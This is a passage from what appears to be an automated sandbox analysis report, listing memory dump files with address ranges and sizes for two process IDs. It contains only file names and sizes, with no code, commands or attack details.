                                      • memory/4688-268-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-23-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-27-0x0000000005290000-0x0000000005291000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4688-143-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-25-0x0000000005270000-0x0000000005271000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4688-28-0x0000000005230000-0x0000000005231000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4688-331-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-334-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-201-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-24-0x0000000005260000-0x0000000005261000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4688-337-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-172-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-31-0x00000000052A0000-0x00000000052A1000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4688-303-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-345-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-30-0x00000000052B0000-0x00000000052B1000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4688-254-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4688-357-0x0000000000790000-0x0000000000C46000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4812-63-0x0000000000C20000-0x00000000010D3000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4812-49-0x0000000000C20000-0x00000000010D3000-memory.dmp

                                        Filesize

                                        4.7MB

                                      We care about your privacy.

                                      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.